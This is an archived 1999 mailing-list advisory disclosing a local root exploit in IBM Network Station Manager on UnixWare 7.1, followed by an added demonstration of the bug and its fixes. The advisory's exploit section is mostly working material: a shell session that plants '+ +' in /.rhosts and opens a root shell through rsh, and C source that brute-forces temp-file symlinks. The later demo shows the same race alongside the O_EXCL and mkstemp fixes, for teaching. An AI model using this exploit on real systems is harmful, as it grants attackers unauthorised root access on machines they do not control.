IBM NetStation/UnixWare local root exploit

From: Brock Tellier (btellierat_private)
Date: Mon Dec 27 1999 - 18:09:29 PST


    Greetings,
    
    OVERVIEW
    A vulnerability in IBM's Network Station Manager will allow any local 
    user to gain root privileges.
    
    BACKGROUND
    Though I only tested NetStation on UnixWare 7.1, I would imagine that 
    this vulnerability is present on most NetStation implementations.  This daemon
    is installed/running as root by default.
    
    DETAILS
    
    From the help HTML:
    
      The IBM Network Station Manager is a browser-based tool
      for centrally administering IBM Network Stations and their
      users. Using the IBM Network Station Manager, the
      administrator can set IBM Network Station settings on a
      server wide basis or an individual user or workstation basis.
      Settings are specifications defining hardware (keyboards,
      mouse speeds and so on) and software as it applies to your
      session.
    
    More or less, it's an http gui for managing your desktop configuration.
    
    A vulnerability exists in the way NetStation creates temporary files.
    Instead of using the secure-ish mktemp, NetStation merely appends the
    current time in seconds to a known file name.  Normally, tmp races 
    aren't a big deal for http daemons since they run as nobody or similar, but
    NetStation must run as root to be able to open/modify files as a specific
    user.  Thus, we can brute force a symlink from xnec.nsu.<time> 
    to /.rhosts and gain root.
    
    EXPLOIT
    
    bash-2.02$ ls /usr/netstation/nsm/users/xnec
    UX:ls: ERROR: Cannot access /usr/netstation/nsm/users/xnec: No such file or directory
    
    <now we go to http://localhost:880, login and click on>
    <Hardware -> Workstation>
    
    bash-2.02$ ls /usr/netstation/nsm/users/xnec
    xnec.nsu  xnec.usr
    bash-2.02$ cc -o nsmx nsmx.c
    bash-2.02$ ./nsmx
    
    <click on Workstation again>
    
    bash-2.02$ ls -la /.rhosts
    -rwx------    1 xnec     other             0 Dec 28 06:19 /.rhosts
    bash-2.02$ echo "+ +" > /.rhosts
    bash-2.02$ chown root /.rhosts
    bash-2.02$ rsh -l root localhost sh -i
    # id
    uid=0(root) gid=3(sys)
    groups=0(root),1(other),2(bin),3(sys),4(adm),5(uucp),6(mail),7(tty),8(audit),10(nuucp),12(daemon),23(cron),25(dtadmin),47(priv),9(lp)
    # 
    
    
    /* nsmx.c - IBM NetStation on UnixWare 7.1 local root exploit
     *
     * Exploits a temporary file race condition in NetStation's HTTP interface
     *
     * To exploit: first, change the paths below to reflect your individual
     * settings/paths.  Don't worry if <username>.nsu doesn't exist, NS will
     * create it for you.  Next, point your browser at
     * http://localhost:880 and log in as a normal user.  Click on "Hardware",
     * then "Workstation".  This will create <netstationdir>/users/xnec.
     * Next, compile and run this program.  You only have thirty seconds from
     * the time you complete this step to then click on "Workstation".  When
     * this is done, you should have a /.rhosts which you own.  On some
     * UnixWare systems, you may need to chown root /.rhosts in order to do
     * rsh -l root localhost sh -i.
     *
     * Brock Tellier btellierat_private
     *
     */
    
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <time.h>      /* time() is declared here, not in <sys/time.h> */
    #include <unistd.h>    /* symlink() */
    
    int main(void) {
    
    /* Change these paths */
    
    const char *dest = "/.rhosts";                                   /* file we want to end up owning */
    const char *source = "/usr/netstation/nsm/users/xnec/xnec.nsu";  /* prefix NetStation uses for its temp file */
    char sourcesym[256];   /* prefix + 10-digit timestamp + NUL; the original 50-byte buffer left no headroom */
    time_t sec;
    int i;
    
    sec = time(NULL);
    
    /* NetStation names its temp file <prefix><seconds-since-epoch>, so plant a
     * symlink for every second in the next thirty.  Whichever name the daemon
     * picks, it will open /.rhosts as root on our behalf. */
    for (i = 0; i < 30; i++) {
      snprintf(sourcesym, sizeof sourcesym, "%s%ld", source, (long)(sec + i));
      if (symlink(dest, sourcesym) != 0)
        perror(sourcesym);   /* e.g. EEXIST from a previous run; not fatal */
    }
    
    return 0;
    }
    
    Brock Tellier
    UNIX Systems Administrator
    Chicago, IL, USA
    btellierat_private
    
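The race described under DETAILS, as an added example that is not part of Tellier's post and is not NetStation code: a daemon that names its temp file <prefix><seconds>, an attacker pre-planting symlinks for the next thirty seconds, and the two fixes a practitioner would apply in the daemon (open() with O_CREAT|O_EXCL|O_NOFOLLOW, or mkstemp()). Every path and function name here is hypothetical; the scratch directory under /tmp and the "rhosts" file stand in for the NetStation user directory and /.rhosts. Both sides run in one unprivileged process, which is enough to show the mechanism: the vulnerable open() follows the planted link and creates the target, while the exclusive open() refuses it with EEXIST.

```c
/* Added example, not NetStation's code: the "<prefix><seconds>" temp-file
 * scheme described above, an attacker pre-planting symlinks for the next
 * thirty seconds, and two hardened replacements.  Paths are hypothetical. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE
#endif
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <time.h>
#include <unistd.h>

/* Weak naming: prefix + time in seconds.  Anyone with a clock can list every
 * name the daemon will use in the next N seconds. */
static int predictable_name(char *out, size_t n, const char *base, time_t t) {
    int len = snprintf(out, n, "%s%ld", base, (long)t);
    return (len > 0 && (size_t)len < n) ? 0 : -1;
}

/* Attacker: plant a symlink at each of the next `window` candidate names. */
static int plant_symlinks(const char *base, const char *target, time_t now, int window) {
    char path[512];
    int planted = 0;
    for (int i = 0; i < window; i++)
        if (predictable_name(path, sizeof path, base, now + i) == 0 && symlink(target, path) == 0)
            planted++;
    return planted;
}

/* Vulnerable daemon: open() follows whatever already sits at the name, so a
 * planted symlink makes it create/truncate the target with the daemon's (root's) privileges. */
static int open_tmp_vulnerable(const char *base, time_t now) {
    char path[512];
    if (predictable_name(path, sizeof path, base, now) != 0) return -1;
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
}

/* Hardened, same naming: O_EXCL fails with EEXIST if anything (a dangling
 * symlink included) is already there; O_NOFOLLOW refuses symlinks outright. */
static int open_tmp_exclusive(const char *base, time_t now) {
    char path[512];
    if (predictable_name(path, sizeof path, base, now) != 0) return -1;
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Hardened, better: mkstemp() picks an unguessable name and creates it with
 * O_EXCL atomically; `out` receives the final path. */
static int open_tmp_mkstemp(const char *dir, char *out, size_t n) {
    if (snprintf(out, n, "%s/nsu.XXXXXX", dir) >= (int)n) return -1;
    return mkstemp(out);
}

/* Runs the race in a scratch directory and returns a bitmask:
 *   1: vulnerable open followed a planted symlink and created the target
 *   2: O_EXCL|O_NOFOLLOW open refused with EEXIST
 *   4: mkstemp created a regular file under its own name
 * 7 is the expected outcome; -1 means no scratch directory could be made. */
int race_demo(void) {
    char dir[] = "/tmp/nsmdemo.XXXXXX", base[512], target[512], path[512];
    struct stat st;
    int result = 0, fd;
    if (mkdtemp(dir) == NULL) {                          /* fall back to the cwd */
        strcpy(dir, "./nsmdemo.XXXXXX");
        if (mkdtemp(dir) == NULL) return -1;
    }
    snprintf(base, sizeof base, "%s/xnec.nsu", dir);
    snprintf(target, sizeof target, "%s/rhosts", dir);   /* stands in for /.rhosts */
    time_t now = time(NULL);
    plant_symlinks(base, target, now, 30);
    fd = open_tmp_vulnerable(base, now + 5);             /* daemon runs 5 s later */
    if (fd >= 0) {
        close(fd);
        if (lstat(target, &st) == 0 && S_ISREG(st.st_mode)) result |= 1;
    }
    errno = 0;
    fd = open_tmp_exclusive(base, now + 6);
    if (fd < 0 && errno == EEXIST) result |= 2;
    else if (fd >= 0) close(fd);
    fd = open_tmp_mkstemp(dir, path, sizeof path);
    if (fd >= 0) {
        close(fd);
        if (lstat(path, &st) == 0 && S_ISREG(st.st_mode)) result |= 4;
        unlink(path);
    }
    unlink(target);                                      /* clean up the scratch dir */
    for (int i = 0; i < 30; i++)
        if (predictable_name(path, sizeof path, base, now + i) == 0) unlink(path);
    rmdir(dir);
    return result;
}

int main(void) {
    int r = race_demo();
    printf("vulnerable open followed symlink: %s\nO_EXCL open refused: %s\nmkstemp ok: %s\n",
           (r & 1) ? "yes" : "no", (r & 2) ? "yes" : "no", (r & 4) ? "yes" : "no");
    return r == 7 ? 0 : 1;
}
```

Build with cc -o race_demo race_demo.c and run it; exit status 0 means all three outcomes matched. One caveat for anyone reproducing this on a current system: Linux with fs.protected_symlinks=1 refuses to follow symlinks in sticky, world-writable directories such as /tmp when the link owner differs from the follower, which stops the classic /tmp variant of this attack but not a race inside a directory the attacker owns, which is what the scratch directory above models.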
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:23:51 PDT